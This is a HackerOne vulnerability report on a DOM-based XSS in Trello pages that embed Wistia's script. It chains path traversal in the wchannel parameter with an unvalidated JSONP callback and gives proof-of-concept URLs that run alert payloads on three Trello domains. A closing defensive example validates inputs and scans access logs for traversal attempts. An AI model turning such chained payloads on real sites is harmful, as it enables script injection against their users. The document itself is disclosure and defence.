Trello: DOM based XSS via Wistia embedding

2016-01-18T17:46:18
ID H1:111440
Type hackerone
Reporter reactors08
Modified 2016-01-20T14:20:31

Description

Hi, you are using Wistia to embed video at trello.com. However, the external script from fast.wistia.com is vulnerable to XSS and allows running malicious JavaScript on your side. Vulnerable code: fast.wistia.net/assets/external/E-v1.js

I found that the parameter wchannel can be controlled to load JS from http://fast.wistia.com/assets/external/E-v1/channels/[controlled input].js. Example: https://trello.com/guide/customize.html?wchannel=../../../../xxxxxxxxxxxxxxx. The browser tried to load the script from: https://fast.wistia.com/assets/external/E-v1/channels/xxxxxxx.js

And now the only thing we need is to find a way to upload a malicious script to fast.wistia.com. I wasn't able to upload anything, but I found that I can control the output of a JSON file via the callback parameter: https://fast.wistia.com/embed/medias/[video id].json?callback=[controlled output]. Proof: https://fast.wistia.com/embed/medias/1yqpy8ics4.json?callback=alert(1)%3Bvar%20x=%27%3bx(//

Okay, now we can attack Trello. Proof: https://trello.com/guide/customize.html?wchannel=../../../../embed/medias/1yqpy8ics4.json%3fcallback%3dalert(1)%253bvar%20x%3d%27%253bx(//%23

http://blog.trello.com/introducing-the-all-new-trello-business-class/?wchannel=../../../../embed/medias/1yqpy8ics4.json%3fcallback%3dalert(document.domain)%253bvar%20x%3d%27%253bx(//%23

http://help.trello.com/article/899-getting-started-video-demo?wchannel=../../../../embed/medias/1yqpy8ics4.json%3fcallback%3dalert(document.domain)%253bvar%20x%3d%27%253bx(//%23
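The report chains two weaknesses: a script path assembled from the untrusted `wchannel` query parameter (so `../` escapes the channels directory) and a JSONP endpoint that echoes the `callback` name unvalidated into a script response. The following is an added example, not Trello's or Wistia's code, showing how a defender would close both and spot traversal attempts in request logs; the function names, the allowlist patterns and the JSONP body format are assumptions of this example.

```javascript
// Added example (not the report's, Trello's or Wistia's code): hardening the
// two patterns the report abuses. Assumed: channel names are single path
// segments, and JSONP callbacks must be plain (dotted) JS identifiers.

const CHANNEL_BASE = 'https://fast.wistia.com/assets/external/E-v1/channels/'; // base path as reported
const CHANNEL_NAME = /^[a-z0-9][a-z0-9_-]{0,63}$/i; // allowlist: no "/", no "." (blocks traversal)
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/; // dotted identifier only

// Builds the channel script URL from ?wchannel=; returns null when the value
// must be rejected instead of being concatenated into a script src.
function channelScriptUrl(wchannel) {
  if (typeof wchannel !== 'string' || !CHANNEL_NAME.test(wchannel)) return null;
  const url = new URL(wchannel + '.js', CHANNEL_BASE);
  // Defence in depth: the resolved URL must still sit inside the channel directory.
  if (!url.href.startsWith(CHANNEL_BASE)) return null;
  return url.href;
}

// Builds a JSONP response body; returns null for a callback that is not a
// bare identifier, so "alert(1);var x='..." can never reach the script body.
function jsonpBody(callback, payload) {
  if (typeof callback !== 'string' || callback.length > 128 || !CALLBACK_NAME.test(callback)) {
    return null;
  }
  // JSON.stringify output cannot close the call expression; escaping
  // U+2028/U+2029 keeps the literal valid inside a <script> context too.
  const json = JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  // Leading comment defeats content sniffing tricks on the first bytes.
  return '/**/' + callback + '(' + json + ');';
}

// Log-review helper: true when a request query string carries a wchannel
// value that the allowlist would reject (traversal or injection attempt).
function flagsTraversal(queryString) {
  const v = new URLSearchParams(queryString).get('wchannel');
  return v !== null && channelScriptUrl(v) === null;
}
```

Run `flagsTraversal` over the query strings in web server access logs to find past attempts against pages that embed the Wistia script.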